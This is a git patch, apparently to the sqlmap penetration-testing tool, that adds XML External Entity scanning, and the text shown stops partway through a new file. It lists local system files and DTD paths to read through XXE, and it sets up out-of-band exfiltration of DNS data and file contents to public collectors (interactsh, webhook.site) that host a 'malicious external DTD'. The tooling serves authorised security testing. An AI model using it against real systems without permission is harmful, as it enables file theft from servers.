From 5fa2da5eaebc38747a8a748ffd6342b88db59db2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Sat, 4 Jul 2026 09:53:04 +0200 Subject: [PATCH] Adding support for --xxe --- data/txt/sha256sums.txt | 21 +- lib/controller/checks.py | 9 + lib/controller/controller.py | 9 +- lib/core/option.py | 27 +- lib/core/optiondict.py | 3 + lib/core/settings.py | 69 +++- lib/parse/cmdline.py | 11 +- lib/request/dns.py | 54 +++ lib/request/interactsh.py | 171 ++++++++ lib/request/webhooksite.py | 72 ++++ lib/techniques/xxe/__init__.py | 8 + lib/techniques/xxe/inject.py | 699 +++++++++++++++++++++++++++++++++ tests/test_dns_server.py | 40 +- tests/test_xxe.py | 236 +++++++++++ 14 files changed, 1413 insertions(+), 16 deletions(-) create mode 100644 lib/request/interactsh.py create mode 100644 lib/request/webhooksite.py create mode 100644 lib/techniques/xxe/__init__.py create mode 100644 lib/techniques/xxe/inject.py create mode 100644 tests/test_xxe.py diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index 1fe9eb1ca..ed2947c53 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -162,8 +162,8 @@ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/ 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py 9af5fdfa8b2425d404d86ab08d3644caa95bcf77605551f5da482a59d1e54a22 extra/vulnserver/vulnserver.py a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py -736715a73941a06e5d3d349dd01a1f1b171f54eb4c374c6752b2cc44b0977ffe lib/controller/checks.py -2086100cd7a78a4e8c12d72bd4f5b414ec6b3f49926e83285494534140e60ce7 lib/controller/controller.py +0d1072ac052b65fca6da9975238b6f8816bc78603631b68ada4c7aea97f060e4 lib/controller/checks.py +00d56cc59757cc3f3073ac20735ac9954ff06242b9433a96bd4186c090094db3 lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py 48ffe93d61734e16c3b20153b51595853d9ac1fbcf0b537e0e61e957b0c0bfa6 lib/core/agent.py @@ -181,15 +181,15 @@ c2db614a3ce7dda889152bea8bd6d709e5d8c2b556741fdbfe44469f27ce266b lib/core/enums 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py -47c9828bdfa606a02f07925539d7af55c5eaf1fda61d05ecc40f73d77df036f9 lib/core/optiondict.py -3ac60716cf1c619b80038acb8b213c728cc607e7c5a387911e01635a23fbc92b lib/core/option.py +23852bdfadfb4bd5663302a63bdcc7227c0314fbdea884167d58ca21cda9fb09 lib/core/optiondict.py +0caac9b4af2cc50321a4d8126d92481ad0b092af2075e7efa19bccef529986fb lib/core/option.py 21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py 0c36a65b6237732eb001d333f80f0c58c088ff01ae80cf07e4dcc6da2a806364 lib/core/readlineng.py 9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -6f4a6f82360addb01fb9581a67f67df30a2d44606b631bf3e1dc026e46f83e55 lib/core/settings.py +d974c44979d7699feda3eafeb1baee9618cb6dbe27b144a6d36bec95527c5cee lib/core/settings.py c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py 15d36cdac9389d0a54a6c33fbb89f32bb65e303f50de573773dcb6d4618bca64 lib/core/target.py @@ -200,7 +200,7 @@ b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unesc 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -fef119c6f3f2fe6a092112fd832d645c58e4c3c2af0bd97ace4487372c1e3574 lib/parse/cmdline.py +6d2b663807178b4eed0060ed22cde5a94d1b63b7f1ce54e401f709acfd2344c0 lib/parse/cmdline.py 925a068efa1885fa40671414a887c088f2aafbe8cb76f01286e6bde3f624dac1 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -215,17 +215,19 @@ bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/ch 4fd1957e31b14e7670b09d85a634fa6772a1cd90babe149f39a1c945fe306f0a lib/request/comparison.py 4a3b997a83b1724e8bd025be95ec5d84c6bf41d533ba097fcab1eab763352111 lib/request/connect.py 8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py -a6b37b436838caeb197fea858d0a39fadbff4736256e741b5fcec1f28fcf1ce0 lib/request/dns.py +b1f07e0571f249eedf294b7827c530b0de8c0524d445b33fdb2d0a639c0f123a lib/request/dns.py 7344978ac1c52060716b7837c88a62768c6a445eafe189ea3232b8a498fdd038 lib/request/http2.py 92c81cc31ff4a396723242058fb2152c9e9745f8412d01ea74480b048a53af6c lib/request/httpshandler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/request/__init__.py 7a0ac2522213e756348fd871a7af74cc963bdc82f9d7ade57be5de42b5bf7cab lib/request/inject.py +fa51d6c8855049ac18b8c08dfea87df3ce0ebcc094d62322e9f615284bca54af lib/request/interactsh.py ff15723c82e343eb95f4599d251165d478ca720afc8f5daaed3da44ea923df44 lib/request/keepalive.py ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4 lib/request/methodrequest.py 43a7fdf64e7ba63c6b2d641c9f999a63c12ac23b43b64fedfce4e05b863de568 lib/request/pkihandler.py b90feeb16e89a844427df42373b0139eb6f6cf3c48ccec32b3e3a3f540c2451e lib/request/rangehandler.py fa347e74361904d052e4d5c958ebbdf080e4f7003176824a44786108b4d7afc6 lib/request/redirecthandler.py 1bf93c2c251f9c422ecf52d9cae0cd0ff4ea2e24091ee6d019c7a4f69de8e5eb lib/request/templates.py +58da8988a650c19e080980e545216158ba267065374c6812dabe0b22c1407bd2 lib/request/webhooksite.py 01600295b17c00d4a5ada4c77aa688cfe36c89934da04c031be7da8040a3b457 lib/takeover/abstraction.py d3c93562d78ebdaf9e22c0ea2e4a62adb12f0ce9e9d9631c1ea000b1a07d04ab lib/takeover/icmpsh.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/takeover/__init__.py @@ -255,6 +257,8 @@ f6678ac1342f8d234ed32ae69be5ac5d7837393e9348929ec029c9764c030e82 lib/techniques c68f8259e0a89a556d049f227041849df584313bd1b5349b02f74a47778c901c lib/techniques/union/use.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py c61816c9dba9f6cc2223aed1a923f95130979e5f0a88ec254ee667d955ed2734 lib/techniques/xpath/inject.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xxe/__init__.py +9a74178421ea0d98f7b27062e97eb55a12236deb893c2ef5f26fb6e734001f32 lib/techniques/xxe/inject.py 2403eda0e87835a2b402cbe6927a4d2737c4e87f3d4ef9b75e7685f3d2a9dc1e lib/utils/api.py 442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py @@ -609,7 +613,7 @@ fa85881aa8d082a65aeacb2b03fcb5d2abb1daa9a02ee24ff048d54fbc904b90 tests/test_dia 41bb0981cb7372753dbaa328c8be3678d328b736e6b97f7bd2573b465753af01 tests/test_dialect.py 993a2d4d87c4fbaf261663b069629acc95ee4405aa0c42cf5a8f39649fdb0fff tests/test_dicts.py 62a4386524d0ef269cba3bd6dcadc5a2a11c0d2bdd198773b79bcd8589324328 tests/test_dns_engine.py -ec58ba0849d90d2bb7580fe2b8b96cd8299ddfc25f14dc27d9de9d41f152c78a tests/test_dns_server.py +a9db98cbb4d16c42118fb6f612edd5bfedc77298e38d06d50e7ecc2faaa7fdc1 tests/test_dns_server.py 3dc788fd3adba8b6f766281e0a50025b1ee9150d80ab9a738c6c43f2eaf805b3 tests/test_dump_format.py 118d1987861ed0df978474329adce8c23009b3964210c13fbaf667e0019bbd15 tests/test_dump_jsonl.py 2bbe4b01f79992cfa8884651fc0a28dbd0e3abb0cbea9eb7eadf1f98ca3c3420 tests/test_encoding.py @@ -666,6 +670,7 @@ b03689c4dcca0e88a62a88784c61418f963c031d338a357dcc223560c8f9bd22 tests/test_use 93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py 81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py 9d6dd551b751ab38200ab190c744ec0a9afa798b37f83b0078a4325ab3f80aec tests/test_xpath.py +140aa78a94fb97e364cead82149f5a2c33d576b721f39ae52a6352072d770793 tests/test_xxe.py 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py diff --git a/lib/controller/checks.py b/lib/controller/checks.py index a7200e3e3..a83a5f2cf 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -57,6 +57,7 @@ from lib.core.dicts import HEURISTIC_NULL_EVAL from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST +from lib.core.enums import POST_HINT from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NOTE @@ -86,6 +87,7 @@ from lib.core.settings import INFERENCE_EQUALS_CHAR from lib.core.settings import LDAP_ERROR_REGEX from lib.core.settings import SSTI_ERROR_REGEX from lib.core.settings import XPATH_ERROR_REGEX +from lib.core.settings import XXE_ERROR_REGEX from lib.core.settings import IPS_WAF_CHECK_PAYLOAD from lib.core.settings import IPS_WAF_CHECK_RATIO from lib.core.settings import IPS_WAF_CHECK_TIMEOUT @@ -1214,6 +1216,13 @@ def heuristicCheckSqlInjection(place, parameter): if conf.beep: beep() + if not conf.xxe and kb.postHint in (POST_HINT.XML, POST_HINT.SOAP) and re.search(XXE_ERROR_REGEX, page or ""): + infoMsg = "heuristic (XXE) test shows that the XML request body might be vulnerable to XML External Entity injection (rerun with switch '--xxe')" + logger.info(infoMsg) + + if conf.beep: + beep() + kb.disableHtmlDecoding = False kb.heuristicMode = False diff --git a/lib/controller/controller.py b/lib/controller/controller.py index ba27f49aa..e81daaf48 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -529,8 +529,8 @@ def start(): checkWaf() - if any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti)) and (conf.reportJson or conf.resultsFile): - singleTimeWarnMessage("'--report-json'/'--results-file' do not (yet) capture non-SQL technique (--graphql/--nosql/--ldap/--xpath/--ssti) findings; these are reported on the console only") + if any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti, conf.xxe)) and (conf.reportJson or conf.resultsFile): + singleTimeWarnMessage("'--report-json'/'--results-file' do not (yet) capture non-SQL technique (--graphql/--nosql/--ldap/--xpath/--ssti/--xxe) findings; these are reported on the console only") if conf.graphql: from lib.techniques.graphql.inject import graphqlScan @@ -557,6 +557,11 @@ def start(): sstiScan() continue + if conf.xxe: + from lib.techniques.xxe.inject import xxeScan + xxeScan() + continue + if conf.nullConnection: checkNullConnection() diff --git a/lib/core/option.py b/lib/core/option.py index f828e4cf9..f6d555808 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -144,6 +144,7 @@ from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler from lib.request.chunkedhandler import ChunkedHandler from lib.request.connect import Connect as Request from lib.request.dns import DNSServer +from lib.request.dns import InteractshDNSServer from lib.request.httpshandler import HTTPSHandler from lib.request.keepalive import HTTPKeepAliveHandler from lib.request.keepalive import HTTPSKeepAliveHandler @@ -935,10 +936,10 @@ def _setTamperingFunctions(): logger.warning(warnMsg) # tamper scripts rewrite SQL injection payloads; the self-contained non-SQL engines - # (--graphql/--nosql/--ldap/--xpath/--ssti) do not run payloads through the tampering hook, so + # (--graphql/--nosql/--ldap/--xpath/--ssti/--xxe) do not run payloads through the tampering hook, so # warn instead of silently ignoring the user's '--tamper' - if kb.tamperFunctions and any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti)): - engine = next(_ for _ in ("graphql", "nosql", "ldap", "xpath", "ssti") if conf.get(_)) + if kb.tamperFunctions and any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti, conf.xxe)): + engine = next(_ for _ in ("graphql", "nosql", "ldap", "xpath", "ssti", "xxe") if conf.get(_)) warnMsg = "tamper scripts are applied to SQL injection payloads only and " warnMsg += "will be ignored by the '--%s' engine" % engine logger.warning(warnMsg) @@ -2581,6 +2582,26 @@ def _setDNSServer(): if not conf.dnsDomain: return + from lib.core.settings import OOB_INTERACTSH_SERVERS + + _requested = conf.dnsDomain.strip().lower() + if _requested in ("interactsh", "oast", "oob") or _requested in OOB_INTERACTSH_SERVERS: + infoMsg = "setting up interactsh-backed DNS exfiltration collector" + logger.info(infoMsg) + + try: + conf.dnsServer = InteractshDNSServer(server=_requested if _requested in OOB_INTERACTSH_SERVERS else None) + conf.dnsServer.run() + conf.dnsDomain = conf.dnsServer.domain + except socket.error as ex: + errMsg = "there was an error while setting up " + errMsg += "the interactsh DNS collector ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + + infoMsg = "using interactsh DNS collector (exfiltration domain '%s')" % conf.dnsDomain + logger.info(infoMsg) + return + infoMsg = "setting up DNS server instance" logger.info(infoMsg) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 8ead48604..08cbf800b 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -125,6 +125,9 @@ optDict = { "ldap": "boolean", "xpath": "boolean", "ssti": "boolean", + "xxe": "boolean", + "oobServer": "string", + "oobToken": "string", "timeSec": "integer", "uCols": "string", "uChar": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 39079dd02..7f4522c89 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.7.23" +VERSION = "1.10.7.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -1071,6 +1071,73 @@ SSTI_ERROR_SIGNATURES = ( SSTI_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in SSTI_ERROR_SIGNATURES) +# XXE parser error signatures for detection and fingerprinting. Each tuple is +# (parser_family, regex_fragment). A match means the XML surface reached a real +# parser and the DOCTYPE/entity was processed (or rejected with a diagnostic) - +# useful both as an error-based oracle and to fingerprint the back-end parser. +XXE_ERROR_SIGNATURES = ( + ("libxml2 (PHP/lxml)", r"(?:failed to load (?:external entity|\")|xmlParseEntityRef|Entity '[^']*' not defined|EntityRef: expecting|Detected an entity reference loop|String not started expecting|StartTag: invalid element name|Start tag expected|Extra content at the end of the document|Premature end of data|error parsing DTD|internal error: Huge input lookup)"), + ("PHP simplexml/DOM", r"(?:simplexml_load_string\(\)|DOMDocument::load(?:XML)?\(\)|SimpleXMLElement::__construct\(\))"), + ("Java (Xerces/JAXP)", r"(?:org\.xml\.sax\.SAXParseException|com\.sun\.org\.apache\.xerces|javax\.xml\.stream\.XMLStreamException|The (?:entity|element type) \"[^\"]*\" was referenced|DOCTYPE is disallowed when the feature|External (?:DTD|parsed entities|Entity): failed|must be declared|had to be read but the maximum)"), + (".NET System.Xml", r"(?:System\.Xml\.XmlException|For security reasons DTD is prohibited|Reference to undeclared entity|An error occurred while parsing EntityName|XmlTextReaderImpl)"), + ("Python expat", r"(?:xml\.parsers\.expat\.ExpatError|undefined entity|not well-formed \(invalid token\)|ExpatError)"), + ("Ruby Nokogiri/REXML", r"(?:Nokogiri::XML::SyntaxError|REXML::ParseException|Entity .* not defined)"), + ("Go encoding/xml", r"XML syntax error on line \d+"), + ("Generic XML", r"(?:XML (?:parsing|parse|syntax) error|malformed XML|unexpected (?:end of|<) )"), +) + +XXE_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XXE_ERROR_SIGNATURES) + +# Signatures indicating a hardened / XXE-safe parser posture (DTDs or external +# entities explicitly refused). Reported as "reachable but protected" - never a hit. +XXE_HARDENED_REGEX = r"(?i)(?:DOCTYPE is disallowed|DTD is prohibited|(?:external )?(?:DTD|entit(?:y|ies)) (?:are|is) (?:not (?:supported|allowed)|disabled|prohibited|forbidden)|loading of external|network access is not allowed|FEATURE_SECURE_PROCESSING|access to external)" + +# Benign, low-entropy files used only to demonstrate file-read impact once XXE is +# confirmed. Deliberately NOT /etc/passwd (WAF honeypots key on "root:x:0:0") - a +# short host-identity file is enough to prove the read without tripping decoys. +# Out-of-band (interactsh) collector for blind XXE confirmation. Public default +# pool (best-effort, may rotate/be blocklisted by WAFs); override with --oob-server +# to point at a self-hosted interactsh-server. Correlation-id + nonce lengths match +# the interactsh defaults (subdomain = <20-char id><13-char nonce>.). +OOB_INTERACTSH_SERVERS = ("oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online", "oast.me") +# Public content-hosting + request-logging endpoint for blind-XXE OOB exfiltration +# (hosts the malicious external DTD and captures the file-bearing callback). Unlike +# interactsh it can serve arbitrary content; HTTP-only. Default exfil target is benign. +OOB_EXFIL_ENDPOINT = "https://webhook.site" +OOB_EXFIL_DEFAULT_FILE = "/etc/hostname" +OOB_CORRELATION_ID_LENGTH = 20 +OOB_NONCE_LENGTH = 13 +OOB_POLL_ATTEMPTS = 5 +OOB_POLL_DELAY = 2 + +# Time-based blind tier: an external entity aimed at this non-routable RFC5737 +# TEST-NET-1 host makes a fetching parser stall on the connection, so a large, +# reproducible response delay betrays otherwise-blind XXE with NO collector needed. +# The delay must exceed a DTD-processing control baseline by this many seconds. +XXE_BLACKHOLE_HOST = "192.0.2.1" +XXE_TIME_THRESHOLD = 5 + +XXE_IMPACT_FILES = ( + ("file:///etc/os-release", r"(?i)^(?:NAME|ID|VERSION)="), # high-signal, tried first + ("file:///c:/windows/win.ini", r"(?i)\[(?:fonts|extensions|mci extensions|files)\]"), + ("file:///etc/hostname", r"^[\w.-]{1,255}$"), # loosest pattern, tried last +) + +# GoSecure dtd-finder local-DTD repurposing table for no-egress error-based XXE: +# an on-disk DTD is loaded, one of its parameter entities is redefined to smuggle +# an error/exfil primitive, so no outbound network is needed. (path, entity_name). +# Windows paths are community-sourced and remain UNVERIFIED vendor-side. +XXE_LOCAL_DTDS = ( + ("file:///usr/share/yelp/dtd/docbookx.dtd", "ISOamso"), # GNOME yelp - reliably repurposable + ("file:///usr/share/xml/docbook/schema/dtd/4.5/docbookx.dtd", "ISOamso"), # docbook package + ("file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd", "connection"), + ("file:///usr/share/xml/fontconfig/fonts.dtd", "constant"), # widespread but gadget is version-fragile + ("file:///C:/Windows/System32/wbem/cim20.dtd", "SuperClass"), # Windows paths community-sourced, UNVERIFIED + ("file:///C:/Windows/System32/wbem/wmi20.dtd", "extension"), + ("file:///C:/Windows/System32/xwizards/xwizard.dtd", "ELEMENT"), + ("jar:file:///usr/share/java/lotus-domino.jar!/schema/domino.dtd", "abbr"), +) + # Upper bound for SSTI value extraction (reserved for future use) SSTI_MAX_LENGTH = 256 diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 9081fe27d..d70b1001d 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -440,7 +440,7 @@ def cmdLineParser(argv=None): help="Column values to use for UNION query SQL injection") techniques.add_argument("--dns-domain", dest="dnsDomain", - help="Domain name used for DNS exfiltration attack") + help="Domain name used for DNS exfiltration attack (or 'interactsh' for zero-setup OOB)") techniques.add_argument("--second-url", dest="secondUrl", help="Resulting page URL searched for second-order response") @@ -790,6 +790,15 @@ def cmdLineParser(argv=None): nonsql.add_argument("--ssti", dest="ssti", action="store_true", help="Test for server-side template injection") + nonsql.add_argument("--xxe", dest="xxe", action="store_true", + help="Test for XML External Entity (XXE) injection") + + nonsql.add_argument("--oob-server", dest="oobServer", + help="Out-of-band server for blind '--xxe' (default: public interactsh; 'none' to disable OOB)") + + nonsql.add_argument("--oob-token", dest="oobToken", + help="Authentication token for a self-hosted '--oob-server'") + # Miscellaneous options miscellaneous = parser.add_argument_group("Miscellaneous", "These options do not fit into any other category") diff --git a/lib/request/dns.py b/lib/request/dns.py index d51c79582..5b7082508 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -225,6 +225,60 @@ class DNSServer(object): thread.daemon = True thread.start() +class InteractshDNSServer(object): + """DNS exfiltration collector backed by a public (or self-hosted) interactsh + interaction server instead of a locally-bound privileged :53 socket. This lets + the '--dns-domain' data-exfiltration technique run with zero infrastructure - no + delegated authoritative domain, no root/Administrator, no reachable listener - + by resolving lookups under the interactsh correlation domain and polling them + back. It presents the same run()/pop(prefix, suffix) surface as DNSServer, so it + is a drop-in for conf.dnsServer. + """ + + def __init__(self, server=None): + from lib.request.interactsh import Interactsh, hasCrypto + + if not hasCrypto(): + raise socket.error("interactsh-backed DNS exfiltration requires the optional 'pycryptodome' package") + + self._client = Interactsh(server=server) + + if not self._client.registered: + raise socket.error("could not register with an interactsh interaction server") + + self.domain = self._client.dnsDomain() + self._seen = set() + self._running = True + self._initialized = True + + def run(self): + """No background listener is needed - interactsh does the receiving.""" + pass + + def pop(self, prefix=None, suffix=None): + """ + Returns a captured DNS lookup name matching the given prefix/suffix + (prefix..suffix.), mirroring DNSServer.pop(). + """ + + retVal = None + + for name in self._client.dnsNames(): + if name in self._seen: + continue + + if prefix is None and suffix is None: + self._seen.add(name) + retVal = name + break + + if prefix and suffix and re.search(r"%s\..+\.%s" % (re.escape(prefix), re.escape(suffix)), name, re.I): + self._seen.add(name) + retVal = name + break + + return retVal + if __name__ == "__main__": server = None try: diff --git a/lib/request/interactsh.py b/lib/request/interactsh.py new file mode 100644 index 000000000..b089dcd75 --- /dev/null +++ b/lib/request/interactsh.py @@ -0,0 +1,171 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import base64 +import json +import time + +from lib.core.common import randomStr +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import HTTP_HEADER +from lib.core.settings import OOB_CORRELATION_ID_LENGTH +from lib.core.settings import OOB_INTERACTSH_SERVERS +from lib.core.settings import OOB_NONCE_LENGTH + +# The interactsh client needs RSA-OAEP(SHA-256) + AES-256-CTR. pycryptodome is an +# optional dependency (sqlmap already uses it opportunistically in lib/utils/hash.py); +# without it the OOB tier is simply skipped rather than erroring. +try: + from Crypto.Cipher import AES + from Crypto.Cipher import PKCS1_OAEP + from Crypto.Hash import SHA256 + from Crypto.PublicKey import RSA + _HAS_CRYPTO = True +except ImportError: + _HAS_CRYPTO = False + + +def hasCrypto(): + return _HAS_CRYPTO + + +class Interactsh(object): + """Minimal interactsh client: registers a per-scan RSA key with a public (or + self-hosted) interactsh server, hands out unique callback URLs, and polls for + the DNS/HTTP interactions they trigger. Interactions are RSA/AES encrypted on + the wire and decrypted locally, so the server operator never sees their content. + All HTTP goes through sqlmap's own request stack (proxy/timeout honoured).""" + + def __init__(self, server=None, token=None): + self.server = None + self.token = token or conf.get("oobToken") + self.correlationId = randomStr(OOB_CORRELATION_ID_LENGTH, lowercase=True) + self.secret = randomStr(32, lowercase=True) + self.registered = False + self._key = None + self._dnsNonce = None + + if not _HAS_CRYPTO: + return + + self._key = RSA.generate(2048) + pubKey = getText(base64.b64encode(getBytes(self._key.publickey().export_key(format="PEM")))) + candidates = [server] if server else list(OOB_INTERACTSH_SERVERS) + + for candidate in candidates: + if not candidate: + continue + body = json.dumps({"public-key": pubKey, "secret-key": self.secret, "correlation-id": self.correlationId}) + if self._request("https://%s/register" % candidate, post=body): + self.server = candidate + self.registered = True + logger.debug("registered with OOB interaction server '%s'" % candidate) + break + + def _request(self, url, post=None): + """Direct request to the interactsh server (a fixed service, never the target). + Self-contained on urllib so it works regardless of sqlmap's request-stack init + order (it is also called during option setup, before getPage is usable); honours + --proxy and tolerates self-signed certs like the rest of sqlmap. Returns the + response body text on success, otherwise None.""" + try: + import ssl + try: + from urllib.request import Request as _Request, build_opener, ProxyHandler, HTTPSHandler + except ImportError: + from urllib2 import Request as _Request, build_opener, ProxyHandler, HTTPSHandler + + headers = {HTTP_HEADER.CONTENT_TYPE: "application/json"} if post is not None else {HTTP_HEADER.ACCEPT: "application/json"} + if self.token: + headers[HTTP_HEADER.AUTHORIZATION] = self.token + + handlers = [] + try: + context = ssl.create_default_context() + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + handlers.append(HTTPSHandler(context=context)) + except Exception: + pass + if conf.get("proxy"): + handlers.append(ProxyHandler({"http": conf.proxy, "https": conf.proxy})) + + request = _Request(url, data=getBytes(post) if post is not None else None, headers=headers) + response = build_opener(*handlers).open(request, timeout=conf.get("timeout") or 30) + return getText(response.read()) + except Exception as ex: + logger.debug("OOB request to '%s' failed: %s" % (url, getText(ex))) + return None + + def url(self): + """Return a fresh unique callback URL (host = correlationId + nonce).""" + nonce = randomStr(OOB_NONCE_LENGTH, lowercase=True) + return "http://%s%s.%s" % (self.correlationId, nonce, self.server) + + def dnsDomain(self): + """Stable domain suffix (host = correlationId + a fixed nonce) usable as an + exfiltration suffix - additional labels prepended by a payload still resolve + to this correlation id, so every DNS lookup under it is captured.""" + if not self._dnsNonce: + self._dnsNonce = randomStr(OOB_NONCE_LENGTH, lowercase=True) + return "%s%s.%s" % (self.correlationId, self._dnsNonce, self.server) + + def dnsNames(self): + """Poll and return the fully-qualified names (minus the server suffix) of the + DNS lookups captured so far, e.g. 'prefix..suffix.'.""" + return [_.get("full-id") for _ in self.poll() if _.get("protocol") == "dns" and _.get("full-id")] + + def poll(self): + """Return the list of decrypted interaction records captured so far.""" + if not self.registered: + return [] + + page = self._request("https://%s/poll?id=%s&secret=%s" % (self.server, self.correlationId, self.secret)) + if not page: + return [] + + try: + response = json.loads(page) + except ValueError: + return [] + + retVal = [] + data = response.get("data") or [] + if data: + try: + aesKey = PKCS1_OAEP.new(self._key, hashAlgo=SHA256).decrypt(base64.b64decode(response["aes_key"])) + except Exception as ex: + logger.debug("OOB AES key decryption failed: %s" % getText(ex)) + return [] + + for item in data: + try: + raw = base64.b64decode(item) + plain = AES.new(aesKey, AES.MODE_CTR, nonce=b"", initial_value=raw[:AES.block_size]).decrypt(raw[AES.block_size:]) + retVal.append(json.loads(getText(plain))) + except Exception as ex: + logger.debug("OOB interaction decryption failed: %s" % getText(ex)) + + return retVal + + def pollUntil(self, attempts, delay): + """Poll repeatedly, returning as soon as any interaction is captured.""" + for _ in range(attempts): + time.sleep(delay) + interactions = self.poll() + if interactions: + return interactions + return [] + + def close(self): + if self.registered: + body = json.dumps({"correlation-id": self.correlationId, "secret-key": self.secret}) + self._request("https://%s/deregister" % self.server, post=body) + self.registered = False diff --git a/lib/request/webhooksite.py b/lib/request/webhooksite.py new file mode 100644 index 000000000..9191ae3ff --- /dev/null +++ b/lib/request/webhooksite.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import json + +from lib.core.data import logger +from lib.core.convert import getText +from lib.core.enums import HTTP_HEADER +from lib.core.settings import OOB_EXFIL_ENDPOINT +from lib.request.connect import Connect as Request + +# webhook.site is used for blind-XXE OOB *exfiltration*: it can both serve a custom +# response (our malicious external DTD) AND log the request the target then makes +# (carrying the file content). interactsh cannot host arbitrary content, hence the +# separate backend. HTTP-only, free tier, no account required for basic tokens. + + +class WebhookSite(object): + 